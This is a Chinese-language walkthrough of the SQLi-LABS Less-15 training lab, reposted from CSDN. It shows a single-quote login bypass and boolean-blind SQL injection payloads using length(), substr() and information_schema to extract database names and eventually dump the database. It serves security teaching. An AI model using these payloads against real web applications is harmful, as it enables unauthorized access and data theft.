SQLi LABS Less-15
【摘要】
第十五关请求方式为POST请求 , 注入方式为 单引号字符串型注入
第一步,判断注入类型
使用万能账号测试注入类型
a' or true #
登录成功 , 使用的是单引号字符串 , 源码如下
使用updatexml() 判断数据库是否报错
a' and updatexml(1,'~',3) #
...
第十五关请求方式为POST请求 , 注入方式为 单引号字符串型注入
第一步,判断注入类型
使用万能账号测试注入类型
a' or true #
登录成功 , 使用的是单引号字符串 , 源码如下
使用updatexml() 判断数据库是否报错
a' and updatexml(1,'~',3) #
数据库不报错 , 只提示成功或者失败 , 所以此关卡应该使用布尔注入 , 源码如下
第二步,获取数据库
使用 length() 判断当前使用的数据库的长度
a' or length(database())>8 #从1开始测试 , 到8时失败 , 固 数据库名字长度为 8
使用substr() 判断数据库名字
a' or substr(database(),1,1)='s' #截取数据库名字的第一个字符 , 从数字,字母,特殊字符的范围内测试
而后测试第二个,第三个,第n个字符 , 直至猜出整个数据库的名字
使用 length() 测试第4个数据库名长度
a' or length(
(select schema_name
from information_schema.schemata limit 3,1))>1 #从1开始测试 , 5时开始出现异常 , 固 长度为5
使用 substr() 测试 数据库名字
a' or substr(
(select schema_name
from information_schema.schemata limit 3,1),1,1)='m' #从第1个字符开始测试 , 测试范围包括所有字母,数字,特殊字符 , 直至测试完整个数据库名
而后用同样的方法测试字段名 , 最终实现脱库
文章来源: blog.csdn.net,作者:士别三日wyx,版权归原作者所有,如需转载,请联系作者。
原文链接:blog.csdn.net/wangyuxiang946/article/details/118095825
【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)